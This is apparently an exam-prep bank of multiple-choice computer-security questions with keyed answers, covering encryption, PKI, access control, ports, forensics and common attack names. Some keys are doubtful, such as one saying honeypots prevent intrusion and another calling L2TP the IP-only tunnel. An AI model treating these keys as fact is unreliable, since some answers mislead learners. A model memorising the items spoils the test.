C,F#Compsec Q64. What two functions does IPSec perform? (Choose two) 	^A. Provides the Secure Shell (SSH) for data confidentiality. 	^B. Provides the Password Authentication Protocol (PAP) for user authentication. 	^C. Provides the Authentication Header (AH) for data integrity. 	^D. Provides the Internet Protocol (IP) for data integrity. 	^E. Provides the Nonrepudiation Header (NH) for identity integrity. 	^F. Provides the Encapsulation Security Payload (ESP) for data confidentiality. 
A#Compsec Q65. A primary drawback to using shared storage clustering for high availability and disaster recover is: ^A. The creation of a single point of vulnerability. 	^B. The increased network latency between the host computers and the RAID (Redundant Array of Independent Disk) subsystem. ^C. The asynchronous writes which must be used to flush the server cache. 	^D. The highest storage capacity required by the RAID (Redundant Array of Independent Disks) subsystem. 
C#Compsec Q66. What are two common methods when using a public key infrastructure for maintaining access to servers in a network? 	^A. ACL and PGP. 	^B. PIM and CRL. 	^C. CRL and OCSP. 	^D. RSA and MD2 
C#Compsec Q67. After installing a new operating system, what configuration changes should be implemented? 	^A. Create application user accounts. 	^B. Rename the guest account. 	^C. Rename the administrator account, disable the guest accounts. 	^D. Create a secure administrator account. 
A#Compsec Q68. Users who configure their passwords using simple and meaningful things such as pet names or birthdays are subject to having their account used by an intruder after what type of attack? 	^A. Dictionary attack 	^B. Brute Force attack 	^C. Spoofing attack 	^D. Random guess attack 	^E. Man in the middle attack 	^F. Change list attack 	^G. Role Based Access Control attack 	^H. Replay attack	^I. Mickey Mouse attack
C#Compsec Q69. By definition, how many keys are needed to lock and unlock data using symmetrickey encryption? 	^A. 3+ 	^B. 2 	^C. 1 	^D. 0 
B#Compsec Q70. What kind of attack are hashed password vulnerable to? 	^A. Man in the middle. 	^B. Dictionary or brute force. 	^C. Reverse engineering. 	^D. DoS (Denial of Service) 
D#Compsec Q71. What is one advantage if the NTFS file system over the FAT16 and FAT32 file systems? 	^A. Integral support for streaming audio files. ^B. Integral support for UNIX compatibility. 	^C. Integral support for dual-booting with Red Hat Linux. 	^D. Integral support for file and folder level permissions. 
B#Compsec Q72. You have identified a number of risks to which your companys assets are exposed, and want to implement policies, procedures, and various security measures. In doing so, what will be your objective? 	^A. Eliminate every threat that may affect the business. 	^B. Manage the risks so that the problems resulting from them will be minimized. 	^C. Implement as many security measures as possible to address every risk that an asset may be exposed to. 	^D. Ignore as many risks as possible to keep costs down. 
B#Compsec Q73. Which of the following results in a domain name server resolving the domain name to a different and thus misdirecting Internet traffic? 	^A. DoS (Denial of Service) 	^B. Spoofing 	^C. Brure force attack 	^D. Reverse DNS (Domain Name Service) 
B,D#Compsec Q74. Active detection IDS systems may perform which of the following when a unauthorized connection attempt is discovered? (Choose all that apply) 	^A. Inform the attacker that he is connecting to a protected network. 	^B. Shut down the server or service. 	^C. Provide the attacker the usernames and passwords for administrative accounts. 	^D. Break of suspicious connections. 
A#Compsec Q75. Honey pots are useful in preventing attackers from gaining access to critical system. True or false? 	^A. True 	^B. False 	^C. It depends on the style of attack used. 
D#Compsec Q76. A autonomous agent that copies itself into one or more host programs, then propagates when the host is run, is best described as a: 	^A. Trojan horse 	^B. Back door 	^C. Logic bomb 	^D. Virus 
C#Compsec Q77. What technology was originally designed to decrease broadcast traffic but is also beneficial in reducing the likelihood of having information compromised by sniffers? 	^A. VPN (Virtual Private Network) 	^B. DMZ (Demilitarized Zone) 	^C. VLAN (Virtual Local Area Network) 	^D. RADIUS (Remote Authentication Dial-in User Service) 
D#Compsec Q78. Of the following services, which one determines what a user can change or view? 	^A. Data integrity 	^B. Data confidentiality 	^C. Data authentication 	^D. Access control 
H#Compsec Q79. IMAP4 requires port ____ to be open. 	^A. 80 	^B. 3869 	^C. 22 	^D. 21 	^E. 23 ^F. 25 ^G. 110	^H. 143	^I. 443 
A#Compsec Q161. Message authentication codes are used to provide which service? 	^A. Integrity 	^B. Fault recovery 	^C. Key recovery 	^D. Acknowledgement 
D#Compsec Q162. When a change to user security policy is made, the policy maker should provide appropriate documentation to: 	^A. The security administrator. 	^B. Auditors 	^C. Users 	^D. All staff. 
B#Compsec Q163. A major difference between a worm and a Trojan horse program is: 	^A. Worms are spread via e-mail while Trojan horses are not. 	^B. Worms are self replicating while Trojan horses are not. 	^C. Worms are a form of malicious code while Trojan horses are not. 	^D. There is no difference. 
D#Compsec Q164. A common algorithm used to verify the integrity of data from a remote user through a the creation of a 128-bit hash from a data input is: 	^A. IPSec (Internal Protocol Security) 	^B. RSA (Rivest Shamir Adelman) 	^C. Blowfish 	^D. MD5 (Message Digest 5) 
B#Compsec Q165. What is the best method of reducing vulnerability from dumpster diving? 	^A. Hiring additional security staff. 	^B. Destroying paper and other media. 	^C. Installing surveillance equipment. 	^D. Emptying the trash can frequently. 
C#Compsec Q166. What is the best method of defence against IP (Internet Protocol) spoofing attacks? 	^A. Deploying intrusion detection systems. 	^B. Creating a DMZ (Demilitarized Zone). 	^C. Applying ingress filtering to routers. 	^D. Thee is not a good defense against IP (Internet Protocol) spoofing. 
A#Compsec Q167. A need to know security policy would grant access based on: 	^A. Least privilege 	^B. Less privilege 	^C. Loss of privilege 	^D. Singe privilege 
D#Compsec Q168. When a user digitally signs a document an asymmetric algorithm is used to encrypt: 	^A. Secret passkeys 	^B. File contents 	^C. Certificates 	^D. Hash results 
B#Compsec Q169. The best way to harden an application that is developed in house is to: 	^A. Use an industry recommended hardening tool. 	^B. Ensure that security is given due considerations throughout the entire development process. 	^C. Try attacking the application to detect vulnerabilities, then develop patches to fix any vulnerabilities found. 	^D. Ensure that the auditing system is comprehensive enough to detect and log any possible intrusion, identifying existing vulnerabilities. 
B#Compsec Q170. Security requirements for servers DO NOT typically include: 	^A. The absence of vulnerabilities used by known forms of attack against server hosts. 	^B. The ability to allow administrative activities to all users. 	^C. The ability to deny access to information on the server other than that intended to be available. 	^D. The ability to disable unnecessary network services that may be built into the operating system or server software. 
A#Compsec Q171. How can an e-mail administrator prevent malicious users from sending e-mails from non-existent domains? 	^A. Enable DNS (Domain Name Service) reverse lookup on the e-mail server. 	^B. Enable DNS (Domain Name Service) forward lookup on the e-mail server. 	^C. Enable DNS (Domain Name Service) recursive queries on the DNS (Domain Name Service) server. 	^D. Enable DNS (Domain Name Service) reoccurring queries on the DNS (Domain Name Service) 
D#Compsec Q172. A network attack that misuses TCPs (Transmission Control Protocol) three way handshake to overload servers and deny access to legitimate users is called a: 	^A. Man in the middle. 	^B. Smurf 	^C. Teardrop 	^D. SYN (Synchronize) 
A#Compsec Q173. Which of the following options describes a challenge-response session? 	^A. A workstation or system that generates a random challenge string that the user enters when prompted along with the proper PIN (Personal Identification Number). 	^B. A workstation or system that generates a random login ID that the user enters when prompted along with the proper PIN (Personal Identification Number). 	^C. A special hardware device that is used to generate random text in a cryptography system. 	^D. The authentication mechanism in the workstation or system does not determine if the owner should be authenticated. 
A#Compsec Q174. A server placed into service for the purpose of attracting a potential intruders attention is known as a: 	^A. Honey pot 	^B. Lame duck 	^C. Teaser 	^D. Pigeon 
A#Compsec Q175. A network administrator wants to restrict internal access to other parts of the network. The network restrictions must be implemented with the least amount of administrative overhead and must be hardware based. ^  What is the best solution? 	^A. Implement firewalls between subnets to restrict access. 	^B. Implement a VLAN (Virtual Local Area Network) to restrict network access. 	^C. Implement a proxy server to restrict access. 	^D. Implement a VPN (Virtual Private Network). 
D#Compsec Q176. Which one of the following would most likely lead to a CGI (Common Gateway Interface) security problem? 	^A. HTTP (Hypertext Transfer Protocol) protocol. 	^B. Compiler or interpreter that runs the CGI (Common Gateway Interface) script. 	^C. The web browser. 	^D. External data supplied by the user. 
B#Compsec Q177. SSL (Secure Sockets Layer) session keys are available in what two lengths? 	^A. 40-bit and 64-bit. 	^B. 40-bit and 128-bit. 	^C. 64-bit and 128-bit. 	^D. 128-bit and 1,024-bit. 
B#Compsec Q92. Many intrusion detection systems look for known patterns or _____ to aid in detecting attacks. 	^A. Viruses 	^B. Signatures 	^C. Hackers 	^D. Malware 
B#Compsec Q93. What type of authentication may be needed when a stored key and memorized password are not strong enough and additional layers of security is needed? 	^A. Mutual 	^B. Multi-factor 	^C. Biometric 	^D. Certificate 
A,D#Compsec Q94. You are the first to arrive at a crime scene in which a hacker is accessing unauthorized data on a file server from across the network. To secure the scene, which of the followings actions should you perform? 	^A. Prevent members of the organization from entering the server room. 	^B. Prevent members of the incident response team from entering the server room. 	^C. Shut down the server to prevent the user from accessing further data. 	^D. Detach the network cable from the server to prevent the user from accessing further data. 
D#Compsec Q95. You are the first person to arrive at a crime scene. An investigator and crime scene technician arrive afterwards to take over the investigation. ^  Which of the following tasks will the crime scene technician be responsible for performing? 	^A. Ensure that any documentation and evidence they possessed is handled over to the investigator. 	^B. Reestablish a perimeter as new evidence presents itself. 	^C. Establish a chain of command.	^D. Tag, bag, and inventory evidence. 
A#Compsec Q96. The defacto IT (Information Technology) security evaluation criteria for the international community is called? 	^A. Common Criteria 	^B. Global Criteria 	^C. TCSEC (Trusted Computer System Evaluation Criteria) 	^D. ITSEC (Information Technology Security Evaluation Criteria) 
C#Compsec Q97. Which of the following is a technical solution that supports high availability? 	^A. UDP (User Datagram Protocol) 	^B. Anti-virus solution 	^C. RAID (Redundant Array of Independent Disks) 	^D. Firewall 
C#Compsec Q98. Which of the following is an example of an asymmetric algorithm? 	^A. CAST (Carlisle Adams Stafford Tavares) 	^B. RC5 (Rivest Cipher 5) 	^C. RSA (Rivest Shamir Adelman) 	^D. SHA-1 (Secure Hashing Algorithm 1) 
B#Compsec Q99. Dave is increasing the security of his Web site by adding SSL (Secure Sockets Layer). Which type of encryption does SSL use? 	^A. Asymmetric 	^B. Symmetric 	^C. Public Key 	^D. Secret 
A#Compsec Q100. What would NOT improve the physical security of workstations? 	^A. Lockable cases, keyboards, and removable media drives. 	^B. Key or password protected configuration and setup. 	^C. Password required to boot. 	^D. Strong passwords. 
C#Compsec Q101. What are the four major components of ISAKMP (Internet Security Association and Key Management Protocol)? ^A. Authentication of peers, threat management, communication management, and cryptographic key establishment. ^B. Authentication of peers, threat management, communication management, and cryptographic key establishment and management. 	^C. Authentication of peers, threat management, security association creation and management cryptographic key establishment and management.	^D management and cryptographic key management. 
D#Compsec Q102. Security training should emphasise that the weakest links in the security of an organization are typically: 	^A. Firewalls 	^B. Polices 	^C. Viruses 	^D. People 
C#Compsec Q103. IEEE (Institute of Electrical and Electronics Engineers) 802.11b is capable of providing data rates of to: 	^A. 10 Mbps (Megabits per second) 	^B. 10.5 Mbps (Megabits per second) 	^C. 11 Mbps (Megabits per second) 	^D. 12 Mbps (Megabits per second) 
A#Compsec Q104. The standard encryption algorithm based on Rijndael is known as: 	^A. AES (Advanced Encryption Standard) 	^B. 3DES (Triple Data Encryption Standard) 	^C. DES (Data Encryption Standard) 	^D. Skipjack 
B#Compsec Q105. Security controls may become vulnerabilities in a system unless they are: 	^A. Designed and implemented by the system vendor. 	^B. Adequately tested. 	^C. Implemented at the application layer in the system. 	^D. Designed to use multiple factors of authentication. 
C#Compsec Q106. Which of the following is considered the best technical solution for reducing the treat of a man in the middle attack? 	^A. Virtual LAN (Local Area Network) 	^B. GRE (Generic Route Encapsulation) tunnel IPIP (Internet Protocol-within-Internet Protocol Encapsulation Protocol) 	^C. PKI (Public Key Infrastructure) 	^D. Enforcement of badge system 
A#Compsec Q107. Access controls based on security labels associated with each data item and each user are known as: 	^A. MACs (Mandatory Access Control) 	^B. RBACs (Role Based Access Control) 	^C. LBACs (List Based Access Control) 	^D. DACs (Discretionary Access Control) 
C#Compsec Q108. An extranet would be best defined as an area or zone: 	^A. Set aside for business to store extra servers for internal use. 	^B. Accessible to the general public for accessing the business web site. 	^C. That allows a business to securely transact with other businesses. 	^D. Added after the original network was built for additional storage. 
D#Compsec Q80. What are access decisions based on in a MAC (Mandatory Access Control) environment? 	^A. Access control lists 	^B. Ownership 	^C. Group membership 	^D. Sensitivity labels 
A#Compsec Q81. As the Security Analyst for your companies network, you want to implement AES. What algorithm will it use? 	^A. Rijndael 	^B. Nagle 	^C. Spanning Tree 	^D. PKI 
B#Compsec Q82. When securing a FTP (File Transfer Protocol) server, what can be done to ensure that only authorized users can access the server? 	^A. Allow blind authentication. 	^B. Disable anonymous authentication. 	^C. Redirect FTP (File Transfer Protocol) to another port. 	^D. Only give the address to users that need access. 
A#Compsec Q83. Asymmetric cryptography ensures that: 	^A. Encryption and authentication can take place without sharing private keys. 	^B. Encryption of the secret key is performed with the fastest algorithm available. 	^C. Encryption occurs only when both parties have been authenticated. 	^D. Encryption factoring is limited to the session key. 
B,C#Compsec Q84. You are promoting user awareness in forensics, so users will know what to do when incidents occur with their computers. ^  Which of the following tasks should you instruct users to perform when an incident occurs? (Choose all that apply) 	^A. Shut down the computer. 	^B. Contact the incident response team. 	^C. Documents what they see on the screen. 	^D. Log off the network. 
B#Compsec Q85. When a session is initiated between the Transport Control Program (TCP) client and server in a network, a very small buffer space exist to handle the usually rapid hand-shaking exchange of messages that sets up the session. ^  What kind of attack exploits this functionality? 	^A. Buffer Overflow 	^B. SYN Attack 	^C. Smurf 	^D. Birthday Attack 
B#Compsec Q86. A program that can infect other programs by modifying them to include a version of itself is a: 	^A. Replicator 	^B. Virus 	^C. Trojan horse 	^D. Logic bomb 
C#Compsec Q87. A collection of information that includes login, file access, other various activities, and actual or attempted legitimate and unauthorized violations is a(n): 	^A. Audit 	^B. ACL (Access Control List) 	^C. Audit trail 	^D. Syslog 
A#Compsec Q88. Forensic procedures must be followed exactly to ensure the integrity of data obtained in an investigation. ^  When making copies of data from a machine that us being examined, which of the following tasks should be done to ensure it is an exact duplicate? 	^A. Perform a cyclic redundancy check using a checksum or hashing algorithm. 	^B. Change the attributes of data to make it read only. 	^C. Open files on the original media and compare them to the copied data. 	^D. Do nothing. Imaging software always makes an accurate image. 
D#Compsec Q89. DAC (Discretionary Access Control) system operate which following statement: 	^A. Files that dont have an owner CANT NOT be modified. 	^B. The administrator of the system is an owner of each object. 	^C. The operating system is an owner of each object. 	^D. Each object has an owner, which has full control over the object. 
C#Compsec Q90. You have decided to implement biometrics as part of your security system. ^  Before purchasing a locking system that uses biometrics to control access to secure 	areas, you need to decide what will be used to authenticate users. ^  Which of the following options relies solely on biometric authentication? 	^A. Username and passwor^D. 	^B. Fingerprints, retinal scans, PIN numbers, and facial characteristics. 	^C. Voice patterns, fingerprints, and retinal scans. 	^D. Strong passwords, PIN numbers, and digital imaging. 
D#Compsec Q91. As the Security Analyst for your companies network, you want to implement Single Signon technology. ^  What benefit can you expect to get when implementing Single Signon? 	^A. You will need to log on twice at all times. 	^B. You can allow for system wide permissions with it. 	^C. You can install multiple applications. 	^D. You can browse multiple directories.
D#Compsec Q109. What authentication problem is addressed by single sign on? 	^A. Authorization through multiple servers. 	^B. Multiple domains. 	^C. Multi-factor authentication. 	^D. Multiple usernames and passwords. 
D#Compsec Q110. An administrator is concerned with viruses in e-mail attachments being distributed and inadvertently installed on users workstations. If the administrator sets up and attachment filter, what types of attachments should be filtered from e-mails to minimize the danger of viruses. 	^A. Text file 	^B. Image files 	^C. Sound files 	^D. Executable files 
A#Compsec Q111. When an ActiveX control is executed, it executes with the privileges of the: 	^A. Current user account 	^B. Administrator account 	^C. Guest account 	^D. System account 
A#Compsec Q112. IDEA (International Data Encryption Algorithm), Blowfish, RC5 (Rivest Cipher 5) and CAST-128 are encryption algorithms of which type? 	^A. Symmetric 	^B. Asymmetric 	^C. Hashing 	^D. Elliptic curve 
C#Compsec Q113. An example of a physical access barrier would be: 	^A. Video surveillance 	^B. Personnel traffic pattern management 	^C. Security guard 	^D. Motion detector 
C#Compsec Q114. Which of the following is likely to be found after enabling anonymous FTP (File Transfer Protocol) read/write access? 	^A. An upload and download directory for each user. 	^B. Detailed logging information for each user. 	^C. Storage and distribution of unlicensed software. 	^D. Fewer server connections and less network bandwidth utilization. 
C#Compsec Q115. A network attack method that uses ICMP (Internet Control Message Protocol) and improperly formatted MTUs (Maximum Transmission Unit) to crash a target computer is known as a: 	^A. Man in the middle attack 	^B. Smurf attack 	^C. Ping of death attack 	^D. TCP SYN (Transmission Control Protocol / Synchronized) attack 
c#Compsec Q116. What is NOT an acceptable use for smart card technology? 	^A. Mobile telephones 	^B. Satellite television access cards 	^C. A PKI (Public Key Infrastructure) token card shared by multiple users 	^D. Credit cards 
B#Compsec Q117. An effective method of preventing computer viruses from spreading is to: 	^A. Require root/administrator access to run programs. 	^B. Enable scanning of e-mail attachments. 	^C. Prevent the execution of .vbs files. 	^D. Install a host based IDS (Intrusion Detection System) 
A#Compsec Q118. A PKI (Public Key Infrastructure) document that serves as the vehicle on which to base common interoperability standards and common assurance criteria on an industry wide basis is a certificate: 	^A. Policy 	^B. Practice 	^C. Procedure 	^D. Process 
C#Compsec Q119. Currently, the most costly method of an authentication is the use of: 	^A. Passwords 	^B. Tokens 	^C. Biometrics 	^D. Shared secrets 
D#Compsec Q120. Which systems should be included in a disaster recover plan? 	^A. All systems. 	^B. Those identified by the board of directors, president or owner. 	^C. Financial systems and human resources systems. 	^D. Systems identified in a formal risk analysis process. 
C#Compsec Q121. What is the best defence against man in the middle attacks? 	^A. A firewall 	^B. Strong encryption 	^C. Strong authentication 	^D. Strong passwords 
A#Compsec Q122. One of the most effective ways for an administrator to determine what security holes reside on a network is to: 	^A. Perform a vulnerability assessment. 	^B. Run a port scan. 	^C. Run a sniffer. 	^D. Install and monitor and IDS (Intrusion Detection System) 
D#Compsec Q123. Analyzing log files after an attack has started as an example of: 	^A. Active detection 	^B. Overt detection 	^C. Covert detection 	^D. Passive detection 
D#Compsec Q124. A malformed MIME (Multipurpose Internet Mail Extensions) header can: 	^A. Create a back door that will allow an attacker free access to a companys private network. 	^B. Create a virus that infects a users computer. 	^C. Cause an unauthorized disclosure of private information. 	^D. Cause an e-mail server to crash. 
D#Compsec Q125. An attacker can determine what network services are enabled on a target system by: 	^A. Installing a rootkit on the target system. 	^B. Checking the services file. 	^C. Enabling logging on the target system. 	^D. Running a port scan against the target system. 
C#Compsec Q126. What type of attack CANNOT be detected by an IDS (Intrusion Detection System)? 	^A. DoS (Denial of Service) 	^B. Exploits of bugs or hidden features 	^C. Spoofed e-mail 	^D. Port scan 
D#Compsec Q127. Regarding security, biometrics are used for. 	^A. Accountability 	^B. Certification 	^C. Authorization 	^D. Authentication 
D#Compsec Q128. What is the most effective social engineering defence strategy? 	^A. Marking of documents 	^B. Escorting of guests 	^C. Badge security system 	^D. Training and awareness 
B#Compsec Q129. A security administrator tasked with confining sensitive data traffic to a specific subnet would do so by manipulating privilege policy based tables in the networks: 	^A. Server 	^B. Router 	^C. VPN (Virtual Private Network) 	^D. Switch 
A#Compsec Q130. For system logging to be an effective security measure, an administrator must: 	^A. Review the logs on a regular basis. 	^B. Implement circular logging. 	^C. Configure the system to shutdown when the logs are full. 	^D. Configure SNMP (Simple Network Management Protocol) traps for logging events. 
A#Compsec Q131. With regards to the use of Instant Messaging, which of the following type of attack strategies is effectively combated with user awareness training? 	^A. Social engineering 	^B. Stealth 	^C. Ambush 	^D. Multi-prolonged 
B#Compsec Q132. The process by which remote users can make a secure connection to internal resources after establishing an Internet connection could correctly be referred to as: 	^A. Channeling 	^B. Tunneling 	^C. Throughput 	^D. Forwarding 
C#Compsec Q133. Appropriate documentation of a security incident is important for each of the following reasons EXCEPT: 	^A. The documentation serves as a lessons learned which may help avoid further exploitation of the same vulnerability. 	^B. The documentation will server as an aid to updating policy and procedure. 	^C. The documentation will indicate who should be fired for the incident. 	^D. The documentation will server as a tool to assess the impact and damage for the incident. 
A#Compsec Q134. Assuring the recipient that a message has not been altered in transit is an example of which of the following: 	^A. Integrity 	^B. Static assurance 	^C. Dynamic assurance 	^D. Cyclical check sequence 
D#Compsec Q135. Which of the following is expected network behaviour? 	^A. Traffic coming from or going to unexpected locations. 	^B. Non-standard or malformed packets/protocol violations. 	^C. Repeated, failed connection attempts. 	^D. Changes in network performance such as variations in traffic loa^D. 
D#Compsec Q136. Which of the following steps in the SSL (Secure Socket Layer) protocol allows for client and server authentication, MAC (Mandatory Access Control) and encryption algorithm negotiation, and selection of cryptographic keys? 	^A. SSL (Secure Sockets Layer) alert protocol. 	^B. SSL (Secure Sockets Layer) change cipher spec protocol. 	^C. SSL (Secure Sockets Layer) record protocol. 	^D. SSL (Secure Sockets Layer) handshake protocol. 
B#Compsec Q137. Which of the following correctly identifies some of the contents of an users X.509 certificate? 	^A. Users public key, object identifiers, and the location of the users electronic identity. 	^B. Users public key, the CA (Certificate Authority) distinguished name, and the type of symmetric algorithm used for encryption. 	^C. Users public key, the certificates serial number, and the certificates validity dates. 	^D. Users public key, the serial number of the CA (Certificate Authority) certificate, and the CRL (Certificate Revocation List) entry point. 
D#Compsec Q138. An organization is implementing Kerberos as its primary authentication protocol. Which of the following must be deployed for Kerberos to function properly? 	^A. Dynamic IP (Internet Protocol) routing protocols for routers and servers. 	^B. Separate network segments for the realms. 	^C. Token authentication devices. 	^D. Time synchronization services for clients and servers. 
D#Compsec Q139. The WAP (Wireless Application Protocol) programming model is based on the following three elements: 	^A. Client, original server, WEP (Wired Equivalent Privacy) 	^B. Code design, code review, documentation 	^C. Client, original server, wireless interface card 	^D. Client, gateway, original server 
A#Compsec Q140. Technical security measures and countermeasures are primary intended to prevent: 	^A. Unauthorized access, unauthorized modification, and denial of authorized access. 	^B. Interoperability of the framework, unauthorized modification, and denial of authorized access. 	^C. Potential discovery of access, interoperability of the framework, and denial of authorized access. 	^D. Interoperability of the framework, unauthorized modification, and unauthorized access. 
C#Compsec Q141. Poor programming techniques and lack of code review can lead to which of the following type of attack? 	^A. CGI (Common Gateway Interface) script 	^B. Birthday 	^C. Buffer overflow 	^D. Dictionary 
B#Compsec Q142. Which of the following is NOT a characteristic of DEN (Directory Enabled Networking)? 	^A. It is mapped into the directory defined as part of the LDAP (Lightweight Directory Access Protocol). 	^B. It is inferior to SNMP (Simple Network Management Protocol). 	^C. It is an object oriented information model. 	^D. It is an industry standard indicating how to construct and store information about a networks users, applications and data. 
B#Compsec Q143. Privileged accounts are most vulnerable immediately after a: 	^A. Successful remote login. 	^B. Privileged user is terminated. 	^C. Default installation is performed. 	^D. Full system backup is performed. 
C#Compsec Q144. What is the advantage of a multi-homed firewall? 	^A. It is relatively inexpensive to implement. 	^B. The firewall rules are easier to manage. 	^C. If the firewall is compromised, only the systems in the DMZ (Demilitarized Zone) are exposed. 	^D. An attacker must circumvent two firewalls. 
B#Compsec Q145. A password security policy can help a system administrator to decrease the probability that a password can be guessed by reducing the passwords: 	^A. Length 	^B. Lifetime 	^C. Encryption level 	^D. Alphabet set 
A#Compsec Q146. An inherent flaw of DAC (Discretionary Access Control) relating to security is: 	^A. DAC (Discretionary Access Control) relies only on the identity of the user or process, leaving room for a Trojan horse. 	^B. DAC (Discretionary Access Control) relies on certificates, allowing attackers to use those certificates. 	^C. DAC (Discretionary Access Control) does not rely on the identity of a user, allowing anyone to use an account. 	^D. DAC (Discretionary Access Control) has no known security flaws. 
A#Compsec Q147. What is the most common method used by attackers to identify the presence of an 801.11b network? 	^A. War driving 	^B. Direct inward dialing	^C. War dialing 	^D. Packet driving 
B#Compsec Q148. The best method to use for protecting a password stored on the server used for user authentication is to: 	^A. Store the server password in clear text. 	^B. Hash the server passwor^D. 	^C. Encrypt the server password with asymmetric keys. 	^D. Encrypt the server password with a public key. 
D#Compsec Q149. During the digital signature process, asymmetric cryptography satisfied what security requirement? 	^A. Confidentiality 	^B. Access control 	^C. Data integrity 	^D. Authentication 
A#Compsec Q150. The most effective way an administrator can protect users from social engineering is: 	^A. Education 	^B. Implement personal firewalls. 	^C. Enable logging on at users desktops. 	^D. Monitor the network with an IDS (Intrusion Detection System) 
C#Compsec Q151. The action of determining with operating system is installed on a system simply by analyzing its response to certain network traffic is called: 	^A. OS (Operating System) scanning. 	^B. Reverse engineering. 	^C. Fingerprinting 	^D. Host hijacking. 
C#Compsec Q152. One of the factors that influence the lifespan of a public key certificate and its associated keys is the: 	^A. Value of the information it is used to protect. 	^B. Cost and management fees. 	^C. Length of the asymmetric hash. 	^D. Data available openly on the cryptographic system. 
B#Compsec Q153. A DRP (Disaster Recovery Plan) typically includes which of the following: 	^A. Penetration testing. 	^B. Risk assessment. 	^C. DoS (Denial of Service) attack. 	^D. ACLs (Access Control List). 
A#Compsec Q154. Which of the following is the best description of separation of duties? 	^A. Assigning different parts of tasks to different employees. 	^B. Employees are granted only the privileges necessary to perform their tasks. 	^C. Each employee is granted specific information that is required to carry out the job function. 	^D. Screening employees before assigning them to a position. 
D#Compsec Q155. Which of the following is a popular VPN (Virtual Private Network) protocol operating at OSI (Open Systems Interconnect) model Layer 3? 	^A. PPP (Point-to-Point Protocol) 	^B. SSL (Secure Sockets Layer) 	^C. L2TP (Layer Two Tunneling Protocol) 	^D. IPSec (Internet Protocol Security) 
C#Compsec Q156. The system administrator has just used a program that highlighted the susceptibility of several servers on the network to various exploits. The program also suggested fixes. What type of program was used? 	^A. Intrusion detection 	^B. Port scanner 	^C. Vulnerability scanner 	^D. Trojan scanner 
C#Compsec Q157. Which protocol is typically used for encrypting traffic between a web browser and web server? 	^A. IPSec (Internet Protocol Security) 	^B. HTTP (Hypertext Transfer Protocol) 	^C. SSL (Secure Sockets Layer) 	^D. VPN (Virtual Private Network) 
D#Compsec Q158. What fingerprinting technique relies on the fact that operating systems differ in the amount of information that is quoted when ICMP (Internet Control Message Protocol) errors are encountered? 	^A. TCP (Transmission Control Protocol) options. 	^B. ICMP (Internet Control Message Protocol) error message quenching. 	^C. Fragmentation handling. 	^D. ICMP (Internet Control Message Protocol) message quoting. 
C#Compsec Q159. Incorrectly detecting authorized access as an intrusion or attack is called a false: 	^A. Negative 	^B. Intrusion 	^C. Positive 	^D. Alarm 
C#Compsec Q160. When hardening a machine against external attacks, what process should be followed when disabling services? 	^A. Disable services such as DHCP (Dynamic Host Configuration Protocol) client and print servers from servers that do not use/serve those functions. 	^B. Disable one unnecessary service after another, while reviewing the effects of the previous action. 	^C. Research the services and their dependencies before disabling any default services. 	^D. Disable services not directly related to financial operations.
B#Compsec Q178. Which access control method provides the most granular access to protected objects? 	^A. Capabilities 	^B. Access control lists 	^C. Permission bits 	^D. Profiles 
B#Compsec Q179. The primary DISADVANTAGE of symmetric cryptography is: 	^A. Speed 	^B. Key distribution 	^C. Weak algorithms 	^D. Memory management 
C#Compsec Q180. Missing audit log entries most seriously affect an organizations ability to: 	^A. Recover destroyed dat^A. 	^B. Legally prosecute an attacker. 	^C. Evaluate system vulnerabilities. 	^D. Create reliable system backups. 
A#Compsec Q181. File encryption using symmetric cryptography satisfies what security requirement? 	^A. Confidentiality 	^B. Access control 	^C. Data integrity 	^D. Authentication 
D#Compsec Q182. Which of the following provides privacy, data integrity and authentication for handles devices in a wireless network environment? 	^A. WEP (Wired Equivalent Privacy) 	^B. WAP (Wireless Application Protocol) 	^C. WSET (Wireless Secure Electronic Transaction) 	^D. WTLS (Wireless Transport Layer Security) 
C#Compsec Q183. The integrity of a cryptographic system is considered compromised if which of the following conditions exist? 	^A. A 40-bit algorithm is used for a large financial transaction. 	^B. The public key is disclosed. 	^C. The private key is disclosed. 	^D. The validity of the data source is compromised. 
C#Compsec Q184. The system administrator concerned about security has designated a special area in which to place the web server away from other servers on the network. This area is commonly known as the? 	^A. Honey pot 	^B. Hybrid subnet 	^C. DMZ (Demilitarized Zone) 	^D. VLAN (Virtual Local Area Network) 
D#Compsec Q185. An administrator of a web server notices many port scans to a server. To limit exposure and vulnerability exposed by these port scans the administrator should: 	^A. Disable the ability to remotely scan the registry. 	^B. Leave all processes running for possible future use. 	^C. Close all programs or processes that use a UDP (User Datagram Protocol) or TCP (Transmission Control Protocol) port. 	^D. Uninstall or disable any programs or processes that are not needed for the proper use of the server. 
D#Compsec Q186. Which encryption scheme relies on both the sender and receiver to use different keys to encrypt and decrypt messages? 	^A. Symmetric 	^B. Blowfish 	^C. Skipjack 	^D. Asymmetric 
B#Compsec Q187. Which tunneling protocol only works on IP networks? 	^A. IPX 	^B. L2TP 	^C. PPTP 	^D. SSH 
D#Compsec Q188. What functionality should be disallowed between a DNS server and untrusted node? 	^A. name resolutions 	^B. reverse ARP requests 	^C. system name resolutions 	^D. zone transfers 
A#Compsec Q189. A document written by the CEO that outlines PKI use, management and deployment is a... 	^A. PKI policy 	^B. PKI procedure 	^C. PKI practice 	^D. best practices guideline 
A#Compsec Q190. Which one does not use Smart Card Technology? 	^A. CD Player 	^B. Cell Phone 	^C. Satellite Cards 	^D. Handheld Computer 
B#Compsec Q191. What port does SNMP use? 	^A. 21 	^B. 161 	^C. 53 	^D. 49 
D#Compsec Q192. What port does TACACS use? 	^A. 21 	^B. 161 	^C. 53 	^D. 49 
B#Compsec Q193. The first step in establishing a disaster recovery plan is to: 	^A. get budgetary approval for the plan. 	^B. agree on the objectives of the plan. 	^C. list possible alternative sites to be used in a disaster event. 	^D. prioritize processes requiring immediate attention in a disaster event. 
C#Compsec Q194. When securing a DNS (Domain Name Service) server, and shutting down all unnecessary ports, which port should NOT be shut down? 	^A. 21 	^B. 23 	^C. 53 	^D. 55 
